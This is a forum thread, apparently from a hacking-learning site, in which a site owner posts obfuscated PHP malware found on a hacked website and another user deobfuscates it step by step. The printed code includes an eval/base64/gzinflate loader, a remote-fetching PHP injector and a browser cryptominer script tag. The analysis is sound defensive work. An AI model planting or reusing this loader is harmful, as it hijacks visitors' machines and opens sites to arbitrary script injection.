Hi, I can't decode this

A place where newbies can post without (much) fear of reprisal. All mission posts should still go in the applicable forum.
Forum rules
Older HTS users: Be nice to the new people.

NEW USERS: This is NOT the place to post about missions! Refer to "Missions" category.

Hi, I can't decode this

Post by sharp_shadow on Tue Dec 12, 2017 1:21 pm
([msg=95058]see Hi, I can't decode this[/msg])

Hi, my website was hacked. And this code was on it.
I tried to decode it to see what it does.

I have basic html/css/php/jquery knowledge and tried to decode this using base64 and utf8 decoders.
I still get code that's unreadable for me.

Anyone knows how to decode this?

Code: Select all
<?php
$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";$ll=@$l1('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');@$ll("jZJva9swEMZfJ5DvUBpTy2Dilo2+2Op1JbhroXOC7QxGCEJRzrGHYxnpTNONfvednPQPhJGBja2733PPibur66ZoBn2nFaFBjapSj6CZw9Mo+RElc/cuy6Z8Rid+8y2KM3fhfR70y5wR3CjDSOefLhWeemEY5qIy4P0Z9HtOq6vQLRAb8ykItHgcrUss2mVrQEtVI9Q4kmoTbDfaYLsqVUA/wUYYBB3oXyPpkksP9ZMt1iO7vK0llqrmsC0NGubmZQV8Dcj35Yzrdc5E1yU3gMy1ZlysKen61KdtnNKOFYRfD/TM9rxjnvemdMcKatYpvKuLs7ODLiRpOBniq7sji/A1yl48sdyAajH8cL4LdAQ1qRqk8oU/niUPk2nG6eO/9fFPLE0fOE3n/vbn3STN/PP/xqdRlBzFkyibJXGW3MTpLeEXR/DxJI6jcZbdf48ms8x/uesRlV2pbqMORtMpYAvS8u+ryEoZeAt2U9pJ1r/LOq8EAlsKA5cf+QqkWsF+cjvcEVqHsG0qm3Dnw+FwQWvRAV0eZKFOLDSnVzxxLeoVs2dvYfPPUqAsWLSV0NgVOHFo06kFeq6//AU=");?>


Greetings and thanks in advance, Sharp_Shadow
sharp_shadow
New User
New User
 
Posts: 2
Joined: Tue Dec 12, 2017 1:17 pm
Blog: View Blog (0)


Re: Hi, I can't decode this

Post by boriz666 on Wed Dec 13, 2017 8:52 am
([msg=95060]see Re: Hi, I can't decode this[/msg])

We are given this code:
========================

Code: Select all
$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";
$ll=@$l1('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');

@$ll("jZJva9swEMZfJ5DvUBpTy2Dilo2+2Op1JbhroXOC7QxGCEJRzrGHYxnpTNONfvednPQPhJGBja2733PPibur66ZoBn2nFaFBjapSj6CZw9Mo+RElc/cuy6Z8Rid+8y2KM3fhfR70y5wR3CjDSOefLhWeemEY5qIy4P0Z9HtOq6vQLRAb8ykItHgcrUss2mVrQEtVI9Q4kmoTbDfaYLsqVUA/wUYYBB3oXyPpkksP9ZMt1iO7vK0llqrmsC0NGubmZQV8Dcj35Yzrdc5E1yU3gMy1ZlysKen61KdtnNKOFYRfD/TM9rxjnvemdMcKatYpvKuLs7ODLiRpOBniq7sji/A1yl48sdyAajH8cL4LdAQ1qRqk8oU/niUPk2nG6eO/9fFPLE0fOE3n/vbn3STN/PP/xqdRlBzFkyibJXGW3MTpLeEXR/DxJI6jcZbdf48ms8x/uesRlV2pbqMORtMpYAvS8u+ryEoZeAt2U9pJ1r/LOq8EAlsKA5cf+QqkWsF+cjvcEVqHsG0qm3Dnw+FwQWvRAV0eZKFOLDSnVzxxLeoVs2dvYfPPUqAsWLSV0NgVOHFo06kFeq6//AU=");


We have split it up to make it more readable.

To figure out what this does we go to a sandbox on the internet,
so we dont have to run it on our own machine, or we could run it in a vm.

http://sandbox.onlinephpfunctions.com/

To check what $l1 translates to, we run the following code in the code tester:

Code: Select all
<?php

$l1="\x63\x72e"."\x61\x74e\x5F"."\x66\x75\x6E"."\x63\x74\x69"."\x6F\x6E";
echo($l1);


Here we get "create_function".
We now know that $l1 contain the string create_function.

Next line we know that @l1 contain create_function, so the resulting code is

Code: Select all
create_function('$x',"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');


From the manual we can see that create function taks a set of variables for the parameters
of the created function, here its $x, the next argument to create_function is:
"e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));'

Which we just print out with echo:
Code: Select all
<?php
echo("e\x76\x61l".'("?>".'."\x67\x7Ai"."\x6E\x66"."\x6C\x61\x74e"."(\x62\x61\x73e"."64"."\x5F\x64e"."\x63\x6F\x64e".'($x)));');


and we get:

eval("?>".gzinflate(base64_decode($x)));

which is run in the next line of the original code with a large string.

Code: Select all
eval("?>".gzinflate(base64_decode("jZJva9swEMZfJ5DvUBpTy2Dilo2+2Op1JbhroXOC7QxGCEJRzrGHYxnpTNONfvednPQPhJGBja2733PPibur66ZoBn2nFaFBjapSj6CZw9Mo+RElc/cuy6Z8Rid+8y2KM3fhfR70y5wR3CjDSOefLhWeemEY5qIy4P0Z9HtOq6vQLRAb8ykItHgcrUss2mVrQEtVI9Q4kmoTbDfaYLsqVUA/wUYYBB3oXyPpkksP9ZMt1iO7vK0llqrmsC0NGubmZQV8Dcj35Yzrdc5E1yU3gMy1ZlysKen61KdtnNKOFYRfD/TM9rxjnvemdMcKatYpvKuLs7ODLiRpOBniq7sji/A1yl48sdyAajH8cL4LdAQ1qRqk8oU/niUPk2nG6eO/9fFPLE0fOE3n/vbn3STN/PP/xqdRlBzFkyibJXGW3MTpLeEXR/DxJI6jcZbdf48ms8x/uesRlV2pbqMORtMpYAvS8u+ryEoZeAt2U9pJ1r/LOq8EAlsKA5cf+QqkWsF+cjvcEVqHsG0qm3Dnw+FwQWvRAV0eZKFOLDSnVzxxLeoVs2dvYfPPUqAsWLSV0NgVOHFo06kFeq6//AU=")));


To check what is eval'ed we just echo the result of gzinflate(base64_decode(..)); again using
the online code tester.

Code: Select all
<?php
echo(gzinflate(base64_decode("jZJva9swEMZfJ5DvUBpTy2Dilo2+2Op1JbhroXOC7QxGCEJRzrGHYxnpTNONfvednPQPhJGBja2733PPibur66ZoBn2nFaFBjapSj6CZw9Mo+RElc/cuy6Z8Rid+8y2KM3fhfR70y5wR3CjDSOefLhWeemEY5qIy4P0Z9HtOq6vQLRAb8ykItHgcrUss2mVrQEtVI9Q4kmoTbDfaYLsqVUA/wUYYBB3oXyPpkksP9ZMt1iO7vK0llqrmsC0NGubmZQV8Dcj35Yzrdc5E1yU3gMy1ZlysKen61KdtnNKOFYRfD/TM9rxjnvemdMcKatYpvKuLs7ODLiRpOBniq7sji/A1yl48sdyAajH8cL4LdAQ1qRqk8oU/niUPk2nG6eO/9fFPLE0fOE3n/vbn3STN/PP/xqdRlBzFkyibJXGW3MTpLeEXR/DxJI6jcZbdf48ms8x/uesRlV2pbqMORtMpYAvS8u+ryEoZeAt2U9pJ1r/LOq8EAlsKA5cf+QqkWsF+cjvcEVqHsG0qm3Dnw+FwQWvRAV0eZKFOLDSnVzxxLeoVs2dvYfPPUqAsWLSV0NgVOHFo06kFeq6//AU=")));


We then get:


Code: Select all
<?php
$ua=strtolower($_SERVER['HTTP_USER_AGENT']);
if(strpos($ua,"bot")===false){
   $url='https://raw.githubusercontent.com/xmrstudio/mrs/master/rj.c';
   try{
      if(function_exists('file_get_contents')){
         ini_set('user_agent',$ua);
         $cont=@file_get_contents($url);
      }
      if(strlen($cont)<1&&function_exists('curl_init')){
         $ch=curl_init();
         $timeout=30;
         curl_setopt($ch,CURLOPT_URL,$url);
         curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
         curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
         curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
         curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
         curl_setopt($ch,CURLOPT_USERAGENT,$ua);
         $cont=curl_exec($ch);
         curl_close($ch);
      }
      $cont=gzinflate(base64_decode($cont));
      $arr=explode('[###]',$cont);
      echo $arr[array_rand($arr)];
   }catch(Exception $e){}
}
?>


This ie eval'ed, which means the php preprocessor run the code above, which
fetches the content of the url https://raw.githubusercontent.com/xmrst ... aster/rj.c
and besa64 decode it and gz inflate it and prints it

The file contents of rj.c is:

Code: Select all
xZFRS8MwFIX/ytgetoGk7XAwtQ5ko5s6mJuioPjQZrFJ1yZpbrq2E/+7dRP1QUEWcU8X7j3kfOfEBayY1DVQ+LRuWVGKF7yDKFFimflSIiySapkRVaII6n3X2ur77vvkJK9Fs839jAteJiKDVpP7XDQPnjVVQuuYHNuo89JGoH2lW+2Tj0ceGo3Go/sNge0YIySMEyME8xYMEKCoEPZaQrIl4CJHQP/XOpd/Ej6DwqT9w92zQyZNnLvG0XcHwIJxylZkYxyz4HNRfejPCINKNX5TfYEIveLWwUe9dK2cc29AvTCeXj8FNhvOhdO1e/snnMTgr+zR/HISDMP0BqKxXI5mdwt5sb4ntLz6BeEr


We run the following in the code tester:

Code: Select all
<?php

$cont='xZFRS8MwFIX/ytgetoGk7XAwtQ5ko5s6mJuioPjQZrFJ1yZpbrq2E/+7dRP1QUEWcU8X7j3kfOfEBayY1DVQ+LRuWVGKF7yDKFFimflSIiySapkRVaII6n3X2ur77vvkJK9Fs839jAteJiKDVpP7XDQPnjVVQuuYHNuo89JGoH2lW+2Tj0ceGo3Go/sNge0YIySMEyME8xYMEKCoEPZaQrIl4CJHQP/XOpd/Ej6DwqT9w92zQyZNnLvG0XcHwIJxylZkYxyz4HNRfejPCINKNX5TfYEIveLWwUe9dK2cc29AvTCeXj8FNhvOhdO1e/snnMTgr+zR/HISDMP0BqKxXI5mdwt5sb4ntLz6BeEr';

$cont=gzinflate(base64_decode($cont));
$arr=explode('[###]',$cont);
echo $arr[array_rand($arr)];



And we get the following result:

Code: Select all
<script src="//mxcdn1.now.sh/jquery.js"></script><script>new jQuery.Anonymous('mine',{throttle:0.2}).start();</script>


Which is output to your site.

This is a mining script, that use the visitors computer in order to mine crypro currency.
Its made in a way to obfuscate what it does, but its just a stupid attempt which can be
figured out with the above easy method.

Be aware that the attacker can replace the content of https://raw.githubusercontent.com/xmrst ... aster/rj.c
with any javascript code, which potentially could steal login cookies, read form fields, skim credit card
numbers, if you got forms like that on your site.
boriz666
Experienced User
Experienced User
 
Posts: 99
Joined: Tue Mar 24, 2015 11:53 am
Blog: View Blog (0)


Re: Hi, I can't decode this

Post by sharp_shadow on Fri Dec 15, 2017 5:01 am
([msg=95064]see Re: Hi, I can't decode this[/msg])

Wow thanks for the explanation! :D
U know a lot.
sharp_shadow
New User
New User
 
Posts: 2
Joined: Tue Dec 12, 2017 1:17 pm
Blog: View Blog (0)


Re: Hi, I can't decode this

Post by oasis on Sat Dec 16, 2017 2:39 am
([msg=95067]see Re: Hi, I can't decode this[/msg])

I enjoyed reading your breakdown. Good work.

@Sharp_shadow did you find out how he hacked your website?
oasis
New User
New User
 
Posts: 23
Joined: Thu Apr 24, 2008 12:57 pm
Blog: View Blog (0)



Return to NZone

Who is online

Users browsing this forum: No registered users and 0 guests